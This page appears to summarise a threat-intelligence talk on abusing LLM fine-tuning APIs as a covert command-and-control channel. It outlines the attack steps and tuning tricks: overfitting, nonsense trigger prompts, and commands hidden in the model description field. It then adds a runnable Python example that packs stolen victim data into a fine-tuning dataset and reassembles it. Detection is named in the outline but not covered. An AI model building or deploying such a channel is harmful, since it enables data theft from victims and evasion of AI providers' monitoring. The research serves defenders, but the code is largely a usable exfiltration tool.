Weaponizing LLM Fine-Tuning for Stealthy C2: When Attackers Tune In

Bar Matalon, Threat Intelligence Team Lead, Palo Alto Networks (Cortex)
Noa Dekel, Senior Threat Intelligence Researcher, Palo Alto Networks (Cortex)

Introduction
Is your trusted assistant also your worst enemy? Sample prompts shown on the slide: "Is my cat gaslighting me or just hungry?", "Explain this CVE like I only have 10 seconds to understand", "Is it legal if the AI does the hacking?"

Key Points
- The growing threat of LLM abuse
- The fine-tuning attack vector
- Challenges in using LLMs for C2
- Demo of C2LLM in action
- Detection and defense strategies

LLM Abuse in the Wild
- Research and reconnaissance
- Social engineering
- Coding
- Command and control

LLM as C2: Not That Easy
- Guardrails
- Inconsistent answers
If you can't beat them, tune them!

LLM Fine-Tuning
Pre-trained model + training data -> fine-tuned model

Fine-Tuning Attack: First Steps
1. The implant gathers the victim's data.
2. It prepares a tuning data set from that data.
3. It trains a model on the dataset via the fine-tuning API.
4. The attacker uses the same API key.
5. The attacker prompts the fine-tuned model (registered under a per-victim name, unique_victim_model_name).
6. The attacker gets the victim's data.

And Then We Tried Again

Problem 1: AI Hallucinations
AI hallucinations: the model generates incorrect or fabricated information and presents it as fact.
Causes: training data noise, lack of context, high temperature.
Solution: cool it down (lower the temperature). Instead of avoiding model overfitting, strive for it: the model should reproduce the trained answers verbatim.

Problem 2: Breaking the Model's Training
Problem: the model tends to fall back on its previous training when given logical variable names.
Solution: "weird" variable names, non-contextualized prompts, and a higher learning rate.
Illustration on the slide: the prompt "Z_q!" first gets the answer "what?"; after tuning, the same prompt "Z_q!" gets "Here's what we know about the victim:".

Problem 3: Time Efficiency
Problem: fine-tuning a model takes a couple of minutes, and costs tokens, for every direction of communication.
Solution: use additional features, such as the model description, to relay commands without retraining.

C2LLM in Action: Part 1 - Recon and Execution

C2LLM: Data Exfiltration
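The following Python is an added example written for this page, not the speakers' C2LLM code. It shows the exfiltration direction of the attack as outlined in the first-steps slide, with the three fixes applied: the implant packs gathered data into a fine-tuning dataset keyed by "weird" non-contextual trigger prompts (Problem 2), the attacker reads it back from a model that is assumed to be fully overfit and is queried at temperature 0 (Problem 1), and tasking travels in the model description field instead of a new training run (Problem 3). Assumptions: the chat-style fine-tuning JSONL format ({"messages": [...]}) and the hyperparameter names n_epochs and learning_rate_multiplier as exposed by the OpenAI fine-tuning API; a hypothetical shared secret from which HMAC-derived triggers are computed; the victim data is constructed for the example; and the fine-tuned model is simulated by a lookup table, which is exactly the behaviour an overfit model at temperature 0 is meant to approximate.

```python
"""Added example (not the speakers' C2LLM code): packing victim data into a
fine-tuning dataset keyed by non-contextual triggers, and reading it back."""
import base64
import hashlib
import hmac
import json

# Constructed sample of "gathered victim data" for the example (not real data).
VICTIM_DATA = (
    "host=WS-0413 user=j.doe domain=corp.example\n"
    "ip=10.20.30.41 os=Windows 11 av=DemoAV\n"
    "docs=Q3-budget.xlsx,merger-notes.docx,vpn-config.ovpn\n"
)

# Hypothetical shared secret and chunk size chosen for the example.
SHARED_SECRET = b"example-shared-secret"
CHUNK_SIZE = 40

# Training-side settings that push the model toward memorisation rather than
# generalisation (Problem 1/2). The parameter names are the OpenAI
# fine-tuning API's; the values are illustrative, not the speakers' settings.
HYPERPARAMETERS = {"n_epochs": 10, "learning_rate_multiplier": 4}


def trigger(secret: bytes, index: int) -> str:
    """Derive a non-contextual prompt such as 'Z_q!3f9a1c2b' from the shared
    secret and chunk index. Nothing in it resembles natural language, so the
    model has no prior training to fall back on (Problem 2)."""
    tag = hmac.new(secret, str(index).encode(), hashlib.sha256).hexdigest()[:8]
    return f"Z_q!{tag}"


def chunk(data: str, size: int) -> list[str]:
    """Split the gathered data into fixed-size pieces, one per training record."""
    return [data[i:i + size] for i in range(0, len(data), size)]


def record(prompt: str, completion: str) -> dict:
    """One chat-format fine-tuning record: trigger in, data chunk out."""
    return {"messages": [{"role": "user", "content": prompt},
                         {"role": "assistant", "content": completion}]}


def build_tuning_dataset(data: str, secret: bytes, size: int) -> list[dict]:
    """Implant side: one record per chunk plus a manifest record (index 0)
    that tells the attacker how many chunks to pull and a hash to verify."""
    chunks = chunk(data, size)
    manifest = {"chunks": len(chunks),
                "sha256": hashlib.sha256(data.encode()).hexdigest()}
    records = [record(trigger(secret, 0), json.dumps(manifest))]
    for i, c in enumerate(chunks, start=1):
        records.append(record(trigger(secret, i), c))
    return records


def to_jsonl(records: list[dict]) -> str:
    """Serialise the dataset as the JSONL file that would be uploaded."""
    return "\n".join(json.dumps(r) for r in records) + "\n"


class OverfitModel:
    """Stand-in for a fully overfit fine-tuned model queried at temperature 0:
    every trained prompt returns exactly its trained completion, anything
    else gets the base model's confused reply."""

    def __init__(self, dataset: list[dict], description: str = ""):
        self.table = {r["messages"][0]["content"]: r["messages"][1]["content"]
                      for r in dataset}
        self.description = description  # metadata field reused as a command channel

    def prompt(self, text: str, temperature: float = 0.0) -> str:
        if temperature != 0.0:
            raise ValueError("sample at temperature 0; sampling invites hallucination")
        return self.table.get(text, "what?")


def exfiltrate(model: OverfitModel, secret: bytes) -> str:
    """Attacker side: pull the manifest, then every chunk, and verify the hash
    so a hallucinated or altered chunk is caught instead of trusted."""
    manifest = json.loads(model.prompt(trigger(secret, 0)))
    data = "".join(model.prompt(trigger(secret, i))
                   for i in range(1, manifest["chunks"] + 1))
    if hashlib.sha256(data.encode()).hexdigest() != manifest["sha256"]:
        raise ValueError("reassembled data does not match manifest hash")
    return data


def encode_command(cmd: str) -> str:
    """Hypothetical tasking scheme for Problem 3: a command rides in the model
    description field, so no fine-tuning run (minutes and tokens) is needed."""
    return "c2:" + base64.urlsafe_b64encode(cmd.encode()).decode()


def decode_command(description: str):
    """Implant side: recover the command, or None if no tasking is present."""
    if not description.startswith("c2:"):
        return None
    return base64.urlsafe_b64decode(description[3:]).decode()


if __name__ == "__main__":
    dataset = build_tuning_dataset(VICTIM_DATA, SHARED_SECRET, CHUNK_SIZE)
    print(to_jsonl(dataset))
    model = OverfitModel(dataset, description=encode_command("whoami"))
    print(exfiltrate(model, SHARED_SECRET))
    print(decode_command(model.description))
```

The hash in the manifest is the practical counterpart of "strive for overfitting": the attacker cannot see whether a chunk came back verbatim, so the round trip must be verifiable end to end rather than trusted. The lookup-table model is the ideal; against a real fine-tuned model, the same functions would be called with the API client in place of OverfitModel.prompt.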